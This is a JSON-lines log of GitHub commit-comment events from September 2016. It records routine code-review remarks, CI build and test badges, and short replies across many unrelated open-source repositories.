{"id":"4557163132","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19005729,"position":null,"line":null,"path":null,"commit_id":"8c8f90c5689ada937dbb1846791727a705752d3d","created_at":"2016-09-13T17:44:51Z","updated_at":"2016-09-13T17:44:51Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1760 of 1760 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c8f90c5689ada937dbb1846791727a705752d3d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c8f90c5689ada937dbb1846791727a705752d3d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c8f90c5689ada937dbb1846791727a705752d3d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-13T17:44:51Z"}
{"id":"4557164590","type":"CommitCommentEvent","actor":{"login":"arexsutton"},"repo":{"name":"arexsutton/MongoQueryBuilder"},"payload":{"comment":{"id":19005731,"position":5,"line":17,"path":"MongoQueryBuilder.Tests/Conventions.cs","commit_id":"1f5ef3d72bd5b640595fa17e313093dcd0962d32","created_at":"2016-09-13T17:45:08Z","updated_at":"2016-09-13T17:45:08Z","body":":+1: that was bugging me"}},"created_at":"2016-09-13T17:45:08Z"}
{"id":"4557166932","type":"CommitCommentEvent","actor":{"login":"x3omdax"},"repo":{"name":"x3omdax/PenBox"},"payload":{"comment":{"id":19005737,"position":null,"line":null,"path":null,"commit_id":"e81ad0469dd2427029a70ae20cecff6c25b2c559","created_at":"2016-09-13T17:45:32Z","updated_at":"2016-09-13T17:45:32Z","body":"corrected miss spelling"}},"created_at":"2016-09-13T17:45:32Z"}
{"id":"4557168451","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005746,"position":30,"line":37,"path":"src/html/index.html","commit_id":"bff258cfb349989ca6b9bc4d7dfcbdb2252e6fa7","created_at":"2016-09-13T17:45:48Z","updated_at":"2016-09-13T17:45:48Z","body":"Att specificera en höjd är inte bra. Vad skulle hända om du har jättemkt text? Texten skulle inte få plats! Bättre använda padding då kommer de aldrig förstöra layouten."}},"created_at":"2016-09-13T17:45:48Z"}
{"id":"4557168832","type":"CommitCommentEvent","actor":{"login":"noffle"},"repo":{"name":"ipfs/ipget"},"payload":{"comment":{"id":19005747,"position":5,"line":10,"path":"package.json","commit_id":"961c333b8e864f373a2daef15a3e57f56a40e927","created_at":"2016-09-13T17:45:52Z","updated_at":"2016-09-13T17:45:52Z","body":"Thanks! Could you make a PR next time? It'd be nice to get eyes + LGTM on incoming dev."}},"created_at":"2016-09-13T17:45:52Z"}
{"id":"4557171005","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005752,"position":5,"line":14,"path":"src/html/index.html","commit_id":"bff258cfb349989ca6b9bc4d7dfcbdb2252e6fa7","created_at":"2016-09-13T17:46:17Z","updated_at":"2016-09-13T17:46:17Z","body":"Onödigt."}},"created_at":"2016-09-13T17:46:17Z"}
{"id":"4557171821","type":"CommitCommentEvent","actor":{"login":"lpinca"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":19005755,"position":null,"line":null,"path":null,"commit_id":"fe76c67911b0e3ff0a132849c45cbbc5b4949d63","created_at":"2016-09-13T17:46:26Z","updated_at":"2016-09-13T17:46:26Z","body":"`deepstram.io` is using engine.io with `uws` as WebSocket server, not `uws`."}},"created_at":"2016-09-13T17:46:26Z"}
{"id":"4557172303","type":"CommitCommentEvent","actor":{"login":"kryshenp"},"repo":{"name":"kryshenp/old-project-for-bachelors-degree"},"payload":{"comment":{"id":19005759,"position":null,"line":null,"path":null,"commit_id":"7f1a348beb25e16a00d938e75da13595c120f98e","created_at":"2016-09-13T17:46:31Z","updated_at":"2016-09-13T17:46:31Z","body":"late 2012"}},"created_at":"2016-09-13T17:46:31Z"}
{"id":"4557172444","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005760,"position":9,"line":18,"path":"src/html/index.html","commit_id":"bff258cfb349989ca6b9bc4d7dfcbdb2252e6fa7","created_at":"2016-09-13T17:46:33Z","updated_at":"2016-09-13T17:46:33Z","body":"Onödigt."}},"created_at":"2016-09-13T17:46:33Z"}
{"id":"4557174876","type":"CommitCommentEvent","actor":{"login":"hcastel1"},"repo":{"name":"hcastel1/Tableau-Public"},"payload":{"comment":{"id":19005765,"position":1,"line":1,"path":"README.md","commit_id":"5a7cd0c5c1e5df09c121a5eaabb4d4af3316f65f","created_at":"2016-09-13T17:47:01Z","updated_at":"2016-09-13T17:47:01Z","body":"This repo contains the scripts which create the underlying data frame for the US-Canada Metro to Metro trade flows Tableau viz found on my tableau public profile. These scripts are actually a complicated amalgam of R and SAS code. "}},"created_at":"2016-09-13T17:47:01Z"}
{"id":"4557175193","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005766,"position":13,"line":22,"path":"src/html/index.html","commit_id":"bff258cfb349989ca6b9bc4d7dfcbdb2252e6fa7","created_at":"2016-09-13T17:47:05Z","updated_at":"2016-09-13T17:47:05Z","body":"Onödigt."}},"created_at":"2016-09-13T17:47:05Z"}
{"id":"4557183850","type":"CommitCommentEvent","actor":{"login":"lpinca"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":19005782,"position":null,"line":null,"path":null,"commit_id":"fe76c67911b0e3ff0a132849c45cbbc5b4949d63","created_at":"2016-09-13T17:48:41Z","updated_at":"2016-09-13T17:48:41Z","body":"It's like saying that a project that uses `Primus` with the `uws` transformer, uses `uws`, that's not technically correct."}},"created_at":"2016-09-13T17:48:41Z"}
{"id":"4557184185","type":"CommitCommentEvent","actor":{"login":"acdlite"},"repo":{"name":"sebmarkbage/react"},"payload":{"comment":{"id":19005784,"position":17,"line":17,"path":"src/renderers/shared/fiber/__tests__/ReactTopLevelFragment-test.js","commit_id":"e4a33f660e02f4b4ec528c3c53fb40bbaa26e1aa","created_at":"2016-09-13T17:48:44Z","updated_at":"2016-09-13T17:48:44Z","body":"Forgot to finish this comment :)"}},"created_at":"2016-09-13T17:48:44Z"}
{"id":"4557187646","type":"CommitCommentEvent","actor":{"login":"DeVoresyah"},"repo":{"name":"SunDi3yansyah/IP"},"payload":{"comment":{"id":19005793,"position":null,"line":null,"path":null,"commit_id":"5d94682b26338735d94ce6a08cd7de939c065c1e","created_at":"2016-09-13T17:49:22Z","updated_at":"2016-09-13T17:49:22Z","body":"maksudnya apa ini :v"}},"created_at":"2016-09-13T17:49:22Z"}
{"id":"4557189079","type":"CommitCommentEvent","actor":{"login":"veronikaslc"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19005795,"position":4,"line":484,"path":"pom.xml","commit_id":"9e2a07d6b1c7256321135aff498cd7cfe4d28937","created_at":"2016-09-13T17:49:38Z","updated_at":"2016-09-13T17:49:38Z","body":"oops, typo kind of thing"}},"created_at":"2016-09-13T17:49:38Z"}
{"id":"4557192435","type":"CommitCommentEvent","actor":{"login":"VaibhaviJ"},"repo":{"name":"VaibhaviJ/RestAPI"},"payload":{"comment":{"id":19005800,"position":null,"line":null,"path":null,"commit_id":"8f7031a92866bd4f1a879b90681a2e3e73c20f32","created_at":"2016-09-13T17:50:16Z","updated_at":"2016-09-13T17:50:16Z","body":"Looks fine"}},"created_at":"2016-09-13T17:50:16Z"}
{"id":"4557193466","type":"CommitCommentEvent","actor":{"login":"ariel-"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19005802,"position":352,"line":1001,"path":"src/server/scripts/Spells/spell_druid.cpp","commit_id":"d8e7a8c12067ae5113652d998da1130e12ed5e81","created_at":"2016-09-13T17:50:26Z","updated_at":"2016-09-13T17:50:26Z","body":"I'm not sure this is needed at all. Maim spell has attribute to interrupt non-player casts. I don't know if this aura is even used."}},"created_at":"2016-09-13T17:50:26Z"}
{"id":"4557193782","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005803,"position":10,"line":52,"path":"src/html/index.html","commit_id":"e867cc7cf1cb16db9d9dde6b75a216611952693e","created_at":"2016-09-13T17:50:29Z","updated_at":"2016-09-13T17:50:29Z","body":"Jag tror du kan ta bort hela den här klassen. Den verkar inte göra något. Aldrig specificera en höjd det förstör om du har mkt text, använd padding isånafall."}},"created_at":"2016-09-13T17:50:29Z"}
{"id":"4557197641","type":"CommitCommentEvent","actor":{"login":"SunDi3yansyah"},"repo":{"name":"SunDi3yansyah/IP"},"payload":{"comment":{"id":19005808,"position":null,"line":null,"path":null,"commit_id":"5d94682b26338735d94ce6a08cd7de939c065c1e","created_at":"2016-09-13T17:51:12Z","updated_at":"2016-09-13T17:51:12Z","body":"ya itu maksudnya 😂"}},"created_at":"2016-09-13T17:51:12Z"}
{"id":"4557198209","type":"CommitCommentEvent","actor":{"login":"SpeedyDanny"},"repo":{"name":"nilzao/soapbox-race-udp"},"payload":{"comment":{"id":19005812,"position":null,"line":null,"path":null,"commit_id":"2c3b4d18a22876e6ee1b12108ec045ebf83e0a1d","created_at":"2016-09-13T17:51:17Z","updated_at":"2016-09-13T17:51:17Z","body":"alright..what program do you use to pack and unpack the soapbox? (imean...i want to try the soapbox/files,modifications that im doing to put them directly in to the server and to try it on my own pc's) by using real cable of lan (not virtual like hamachi) im trying to make some changes on my own to see how it will go..."}},"created_at":"2016-09-13T17:51:17Z"}
{"id":"4557201588","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005819,"position":23,"line":61,"path":"src/html/index.html","commit_id":"e867cc7cf1cb16db9d9dde6b75a216611952693e","created_at":"2016-09-13T17:51:53Z","updated_at":"2016-09-13T17:51:53Z","body":"Visst de funkar att flytta på den med relative positioning men man kan lösa de på ett mkt bättre sätt!"}},"created_at":"2016-09-13T17:51:53Z"}
{"id":"4557202170","type":"CommitCommentEvent","actor":{"login":"gkal19"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":19005821,"position":null,"line":null,"path":null,"commit_id":"abe8942bb2812441d7478128b62507d6984f59bb","created_at":"2016-09-13T17:51:59Z","updated_at":"2016-09-13T17:51:59Z","body":"Amazing!!"}},"created_at":"2016-09-13T17:51:59Z"}
{"id":"4557202681","type":"CommitCommentEvent","actor":{"login":"matobet"},"repo":{"name":"matobet/manageiq"},"payload":{"comment":{"id":19005823,"position":5,"line":8,"path":"lib/extensions/ar_region.rb","commit_id":"0401c16fef5d1ba5f8b5aa5ae432834b1322140b","created_at":"2016-09-13T17:52:04Z","updated_at":"2016-09-13T17:52:04Z","body":"Yes, I had problem parsing \r\n```json\r\n\"resource\": {\r\n  \"source_provider\": { \"href\": \"http://localhost:3000/api/providers/2\" }\r\n}\r\n```\r\nWhen the ID consisted only of *one* digit. This change seemed to fix it. Of course if it is indeed a bug and not just a misunderstanding from my side, I'd make this a separate change."}},"created_at":"2016-09-13T17:52:04Z"}
{"id":"4557203472","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19005828,"position":null,"line":null,"path":null,"commit_id":"e83fe087183ed3031a4e9b47811c91cc627cefc7","created_at":"2016-09-13T17:52:14Z","updated_at":"2016-09-13T17:52:14Z","body":"The following doc(s) have been deployed to the [1884drush](https://1884drush-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/drush-versions](https://1884drush-static-docs.pantheonsite.io/docs/drush-versions)\n- [docs/pantheon-yml](https://1884drush-static-docs.pantheonsite.io/docs/pantheon-yml)\n- [docs/php-versions](https://1884drush-static-docs.pantheonsite.io/docs/php-versions)\n"}},"created_at":"2016-09-13T17:52:14Z"}
{"id":"4557204162","type":"CommitCommentEvent","actor":{"login":"cchantep"},"repo":{"name":"playframework/playframework"},"payload":{"comment":{"id":19005829,"position":17,"line":0,"path":"framework/src/play-netty-server/src/main/scala/play/core/server/netty/NettyModelConversion.scala","commit_id":"a04eb013f3055e4bee2fc81869a1e271ce5d20e8","created_at":"2016-09-13T17:52:20Z","updated_at":"2016-09-13T17:52:20Z","body":"`.headOption.flatten` | `.headOption.flatMap(identity)` ?"}},"created_at":"2016-09-13T17:52:20Z"}
{"id":"4557204938","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005830,"position":28,"line":66,"path":"src/html/index.html","commit_id":"e867cc7cf1cb16db9d9dde6b75a216611952693e","created_at":"2016-09-13T17:52:29Z","updated_at":"2016-09-13T17:52:29Z","body":"Backgrunden är vit per default."}},"created_at":"2016-09-13T17:52:29Z"}
{"id":"4557205350","type":"CommitCommentEvent","actor":{"login":"amueller"},"repo":{"name":"scikit-learn/scikit-learn"},"payload":{"comment":{"id":19005831,"position":null,"line":null,"path":null,"commit_id":"e5fede557e65522329dbef8c6226e75ece6259a9","created_at":"2016-09-13T17:52:31Z","updated_at":"2016-09-13T17:52:31Z","body":"If you're tagging the release on the new branch,  I can do the maintenance fix stuff in master in the meantime"}},"created_at":"2016-09-13T17:52:31Z"}
{"id":"4557208538","type":"CommitCommentEvent","actor":{"login":"ToucanSam"},"repo":{"name":"ToucanSam/periscope_api"},"payload":{"comment":{"id":19005838,"position":null,"line":null,"path":null,"commit_id":"7e6ecd514dab5534ab6391b9bd06daa11411524b","created_at":"2016-09-13T17:53:06Z","updated_at":"2016-09-13T17:53:06Z","body":"Thank you imma see what I can do"}},"created_at":"2016-09-13T17:53:06Z"}
{"id":"4557212550","type":"CommitCommentEvent","actor":{"login":"cchantep"},"repo":{"name":"playframework/playframework"},"payload":{"comment":{"id":19005845,"position":13,"line":0,"path":"framework/src/play-netty-server/src/main/scala/play/core/server/netty/NettyModelConversion.scala","commit_id":"a04eb013f3055e4bee2fc81869a1e271ce5d20e8","created_at":"2016-09-13T17:53:47Z","updated_at":"2016-09-13T17:53:47Z","body":"`private` ?"}},"created_at":"2016-09-13T17:53:47Z"}
{"id":"4557214437","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":19005857,"position":null,"line":null,"path":null,"commit_id":"bfcaacf0b2bb20fe918571023a1b43a01370b0bf","created_at":"2016-09-13T17:54:09Z","updated_at":"2016-09-13T17:54:09Z","body":"@datakurre Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.tiles/51/violations\n```\nplone/tiles/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/tiles/data.py:196:1: C901 'map_to_pairs' is too complex (12)\nplone/tiles/data.py:244:1: C901 'encode' is too complex (15)\nplone/tiles/data.py:325:1: C901 'decode' is too complex (13)\nplone/tiles/directives.py:0:1: I001 isort found changes, run it on the file\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-13T17:54:09Z"}
{"id":"4557214641","type":"CommitCommentEvent","actor":{"login":"cchantep"},"repo":{"name":"playframework/playframework"},"payload":{"comment":{"id":19005860,"position":21,"line":0,"path":"framework/src/play-netty-server/src/main/scala/play/core/server/netty/NettyModelConversion.scala","commit_id":"a04eb013f3055e4bee2fc81869a1e271ce5d20e8","created_at":"2016-09-13T17:54:11Z","updated_at":"2016-09-13T17:54:11Z","body":"`private` ?"}},"created_at":"2016-09-13T17:54:11Z"}
{"id":"4557215525","type":"CommitCommentEvent","actor":{"login":"struszc"},"repo":{"name":"struszc/GitUniverse-Plumbers-guide"},"payload":{"comment":{"id":19005863,"position":4,"line":11,"path":"_posts/2016-06-10-travis-ci.md","commit_id":"eddd29fc2aacfd21a3c3465ee6b4f3bfce192dea","created_at":"2016-09-13T17:54:20Z","updated_at":"2016-09-13T17:54:20Z","body":"Take this out"}},"created_at":"2016-09-13T17:54:20Z"}
{"id":"4557217982","type":"CommitCommentEvent","actor":{"login":"cchantep"},"repo":{"name":"playframework/playframework"},"payload":{"comment":{"id":19005866,"position":23,"line":0,"path":"framework/src/play-netty-server/src/main/scala/play/core/server/netty/NettyModelConversion.scala","commit_id":"a04eb013f3055e4bee2fc81869a1e271ce5d20e8","created_at":"2016-09-13T17:54:44Z","updated_at":"2016-09-13T17:54:44Z","body":"Unsafe?"}},"created_at":"2016-09-13T17:54:44Z"}
{"id":"4557218306","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005867,"position":36,"line":86,"path":"src/html/index.html","commit_id":"e867cc7cf1cb16db9d9dde6b75a216611952693e","created_at":"2016-09-13T17:54:47Z","updated_at":"2016-09-13T17:54:47Z","body":"list-style ska stå på <li> det är en förkortning på list. <li> = list = list-style"}},"created_at":"2016-09-13T17:54:47Z"}
{"id":"4557222630","type":"CommitCommentEvent","actor":{"login":"kgrgreer"},"repo":{"name":"foam-framework/foam2-experimental"},"payload":{"comment":{"id":19005879,"position":null,"line":null,"path":null,"commit_id":"82985c75b76da44af7c8ef4c8c2db15ddf8ba39d","created_at":"2016-09-13T17:55:27Z","updated_at":"2016-09-13T17:55:27Z","body":"LGTM"}},"created_at":"2016-09-13T17:55:27Z"}
{"id":"4557223556","type":"CommitCommentEvent","actor":{"login":"dnesbitt61"},"repo":{"name":"valhalla/mjolnir"},"payload":{"comment":{"id":19005882,"position":3,"line":235,"path":"taginfo.json","commit_id":"c61366fd17be6e05a5b08f8e7d185bbc52ae69f1","created_at":"2016-09-13T17:55:35Z","updated_at":"2016-09-13T17:55:35Z","body":"We publish the taginfo to OSM. Since these are not OSM tags we might not want to put this in taginfo."}},"created_at":"2016-09-13T17:55:35Z"}
{"id":"4557225889","type":"CommitCommentEvent","actor":{"login":"schmitch"},"repo":{"name":"playframework/playframework"},"payload":{"comment":{"id":19005890,"position":23,"line":0,"path":"framework/src/play-netty-server/src/main/scala/play/core/server/netty/NettyModelConversion.scala","commit_id":"a04eb013f3055e4bee2fc81869a1e271ce5d20e8","created_at":"2016-09-13T17:55:58Z","updated_at":"2016-09-13T17:55:58Z","body":"what do you mean with Unsafe?"}},"created_at":"2016-09-13T17:55:58Z"}
{"id":"4557228165","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005900,"position":63,"line":116,"path":"src/html/index.html","commit_id":"e867cc7cf1cb16db9d9dde6b75a216611952693e","created_at":"2016-09-13T17:56:24Z","updated_at":"2016-09-13T17:56:24Z","body":"Du kan ta bort section, det räcker med att specificera klassen."}},"created_at":"2016-09-13T17:56:24Z"}
{"id":"4557229252","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":19005905,"position":null,"line":null,"path":null,"commit_id":"fe76c67911b0e3ff0a132849c45cbbc5b4949d63","created_at":"2016-09-13T17:56:36Z","updated_at":"2016-09-13T17:56:36Z","body":"My logic is that if a project defaults to uws as the underlying transport implementation, then it is \"built with µWS\" ™®℠, patent-pending, Inc."}},"created_at":"2016-09-13T17:56:36Z"}
{"id":"4557230182","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005907,"position":69,"line":122,"path":"src/html/index.html","commit_id":"e867cc7cf1cb16db9d9dde6b75a216611952693e","created_at":"2016-09-13T17:56:45Z","updated_at":"2016-09-13T17:56:45Z","body":"Samma här. Räcker med klassen."}},"created_at":"2016-09-13T17:56:45Z"}
{"id":"4557230633","type":"CommitCommentEvent","actor":{"login":"tnoworyta"},"repo":{"name":"foreverhungry/CodeEval_solutions"},"payload":{"comment":{"id":19005909,"position":8,"line":8,"path":"exercises/2016-09-08/person_with_tasks.rb","commit_id":"161cb46aaecf2d09a5e292d41b3bc58dc161695b","created_at":"2016-09-13T17:56:49Z","updated_at":"2016-09-13T17:56:49Z","body":"Można użyć `alias_method :completed?, :completed`"}},"created_at":"2016-09-13T17:56:49Z"}
{"id":"4557232586","type":"CommitCommentEvent","actor":{"login":"timj"},"repo":{"name":"lsst/ctrl_iip"},"payload":{"comment":{"id":19005918,"position":null,"line":null,"path":null,"commit_id":"fcb0a9fd4f99f6d3ff6ab8f51aad948fdb63c5ae","created_at":"2016-09-13T17:57:11Z","updated_at":"2016-09-13T17:57:11Z","body":"Please add a `.gitignore` file with `tests/.cache` included (and I'm sure others)."}},"created_at":"2016-09-13T17:57:11Z"}
{"id":"4557233816","type":"CommitCommentEvent","actor":{"login":"tnoworyta"},"repo":{"name":"foreverhungry/CodeEval_solutions"},"payload":{"comment":{"id":19005924,"position":10,"line":10,"path":"exercises/2016-09-08/prime_palindrome.rb","commit_id":"161cb46aaecf2d09a5e292d41b3bc58dc161695b","created_at":"2016-09-13T17:57:25Z","updated_at":"2016-09-13T17:57:25Z","body":"zamiast puts + break można użyć `return num`"}},"created_at":"2016-09-13T17:57:25Z"}
{"id":"4557235594","type":"CommitCommentEvent","actor":{"login":"kunallillaney"},"repo":{"name":"neurodata/ndingest"},"payload":{"comment":{"id":19005931,"position":2,"line":2,"path":"settings/settings.ini.example","commit_id":"feccb01436852b31d0db971b06b6eb47a0c17824","created_at":"2016-09-13T17:57:40Z","updated_at":"2016-09-13T17:57:40Z","body":"@dkleissa @movestill I have now eliminated Neurodata/Boss from all files. We load this directly from settings.ini and gets used automatically everywhere. The code base should now be good to go for you guys. I will push some minor lambda changes. We can talk about SNS later."}},"created_at":"2016-09-13T17:57:40Z"}
{"id":"4557237674","type":"CommitCommentEvent","actor":{"login":"lmccart"},"repo":{"name":"mayaman/p5js-website"},"payload":{"comment":{"id":19005936,"position":41,"line":204,"path":"src/assets/js/init.js","commit_id":"c3a9bba6a1c56c62ad6ffd98a2dda26a246eb24a","created_at":"2016-09-13T17:58:00Z","updated_at":"2016-09-13T17:58:00Z","body":"this makes sense, I'll make the change when I get a chance."}},"created_at":"2016-09-13T17:58:00Z"}
{"id":"4557238051","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005940,"position":79,"line":132,"path":"src/html/index.html","commit_id":"e867cc7cf1cb16db9d9dde6b75a216611952693e","created_at":"2016-09-13T17:58:04Z","updated_at":"2016-09-13T17:58:04Z","body":"Utifrån att bara läsa koden så verkar overflow, background, background-size onödiga"}},"created_at":"2016-09-13T17:58:04Z"}
{"id":"4557241613","type":"CommitCommentEvent","actor":{"login":"hwin16"},"repo":{"name":"lsst/ctrl_iip"},"payload":{"comment":{"id":19005958,"position":null,"line":null,"path":null,"commit_id":"fcb0a9fd4f99f6d3ff6ab8f51aad948fdb63c5ae","created_at":"2016-09-13T17:58:40Z","updated_at":"2016-09-13T17:58:40Z","body":"Thank you, Tim. I will add that."}},"created_at":"2016-09-13T17:58:40Z"}
{"id":"4557245696","type":"CommitCommentEvent","actor":{"login":"SEAPUNK"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":19005971,"position":null,"line":null,"path":null,"commit_id":"fe76c67911b0e3ff0a132849c45cbbc5b4949d63","created_at":"2016-09-13T17:59:26Z","updated_at":"2016-09-13T17:59:26Z","body":"> that's not technically correct (indirectly it is).\r\n\r\nI'd disagree, I'd say that `uws` is a WebSocket engine, while Primus/engine.io/socket.io/etc are realtime frameworks, a superset of realtime communication. Apples to oranges.\r\n"}},"created_at":"2016-09-13T17:59:26Z"}
{"id":"4557246224","type":"CommitCommentEvent","actor":{"login":"ax3l"},"repo":{"name":"dpgrote/Forthon"},"payload":{"comment":{"id":19005974,"position":5,"line":105,"path":"setup.py","commit_id":"8eb122f031adc17c4f6f925d249badcc2a718ccf","created_at":"2016-09-13T17:59:32Z","updated_at":"2016-09-13T17:59:32Z","body":"@dpgrote well, actually the modified BSD license you use allows way more than that category.\r\n\r\n\"Free to use but restricted\" applies to \"Freeware\" where you only get a binary blob and the right to use it but no right to modify, redistribute, change the source, etc. (very simplified, not a legal advise)."}},"created_at":"2016-09-13T17:59:32Z"}
{"id":"4557248909","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19005980,"position":null,"line":null,"path":null,"commit_id":"0e6d0249556fae9afef428dc1c0822388c29d780","created_at":"2016-09-13T18:00:02Z","updated_at":"2016-09-13T18:00:02Z","body":"os_2_0_develop (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0e6d0249556fae9afef428dc1c0822388c29d780-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0e6d0249556fae9afef428dc1c0822388c29d780-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T18:00:02Z"}
{"id":"4557252955","type":"CommitCommentEvent","actor":{"login":"cchantep"},"repo":{"name":"playframework/playframework"},"payload":{"comment":{"id":19005987,"position":23,"line":0,"path":"framework/src/play-netty-server/src/main/scala/play/core/server/netty/NettyModelConversion.scala","commit_id":"a04eb013f3055e4bee2fc81869a1e271ce5d20e8","created_at":"2016-09-13T18:00:45Z","updated_at":"2016-09-13T18:00:45Z","body":"Possible uncaught exception (as function is not private)"}},"created_at":"2016-09-13T18:00:45Z"}
{"id":"4557253592","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19005990,"position":127,"line":194,"path":"src/html/index.html","commit_id":"e867cc7cf1cb16db9d9dde6b75a216611952693e","created_at":"2016-09-13T18:00:52Z","updated_at":"2016-09-13T18:00:52Z","body":"Räcker med att skriva padding: 0 15px; det gör samma sak"}},"created_at":"2016-09-13T18:00:52Z"}
{"id":"4557255570","type":"CommitCommentEvent","actor":{"login":"sunset1215"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":19006002,"position":null,"line":null,"path":null,"commit_id":"904fc6aff546e28c14ed88cfb28f544d05690602","created_at":"2016-09-13T18:01:15Z","updated_at":"2016-09-13T18:01:15Z","body":"@kwonn try this guide, i used method 2 - http://githubtraining.com/fix-merge-conflict-git-using-sourcetree/ "}},"created_at":"2016-09-13T18:01:15Z"}
{"id":"4557258459","type":"CommitCommentEvent","actor":{"login":"bdejong"},"repo":{"name":"MTG/freesound"},"payload":{"comment":{"id":19006012,"position":80,"line":96,"path":"support/views.py","commit_id":"b2d01aa06cb4a1ccb6b50bc788ac19a97bee1ed7","created_at":"2016-09-13T18:01:46Z","updated_at":"2016-09-13T18:01:46Z","body":"Please remove the [\"support\"] as a header is already added in zendesk..."}},"created_at":"2016-09-13T18:01:46Z"}
{"id":"4557264727","type":"CommitCommentEvent","actor":{"login":"bdejong"},"repo":{"name":"MTG/freesound"},"payload":{"comment":{"id":19006025,"position":27,"line":45,"path":"support/views.py","commit_id":"b2d01aa06cb4a1ccb6b50bc788ac19a97bee1ed7","created_at":"2016-09-13T18:02:53Z","updated_at":"2016-09-13T18:02:53Z","body":"@ffont This is redundant: you are already doing it in the view."}},"created_at":"2016-09-13T18:02:53Z"}
{"id":"4557268394","type":"CommitCommentEvent","actor":{"login":"CSBCounsel"},"repo":{"name":"CSBCounsel/new-llc-intake"},"payload":{"comment":{"id":19006034,"position":null,"line":null,"path":null,"commit_id":"6adfd72776d15c7da9218cc7432a2305f9bd730e","created_at":"2016-09-13T18:03:28Z","updated_at":"2016-09-13T18:03:28Z","body":"If a users inputs YES, Yes, or yes, it should let them proceed. Otherwise, it should not. But it is not accepting the \"or.\""}},"created_at":"2016-09-13T18:03:28Z"}
{"id":"4557273626","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Taddeee/Testprojekt"},"payload":{"comment":{"id":19006055,"position":143,"line":210,"path":"src/html/index.html","commit_id":"e867cc7cf1cb16db9d9dde6b75a216611952693e","created_at":"2016-09-13T18:04:26Z","updated_at":"2016-09-13T18:04:26Z","body":"Just nu verkar inte vertical-align, transform och backface göra något"}},"created_at":"2016-09-13T18:04:26Z"}
{"id":"4557274660","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19006058,"position":null,"line":null,"path":null,"commit_id":"b0d150f71981d81eeacfd16f2661541cc3e8fe2f","created_at":"2016-09-13T18:04:37Z","updated_at":"2016-09-13T18:04:37Z","body":"You forgot to replace base_url link with SITE_ROOT for previous year Cartoonists."}},"created_at":"2016-09-13T18:04:37Z"}
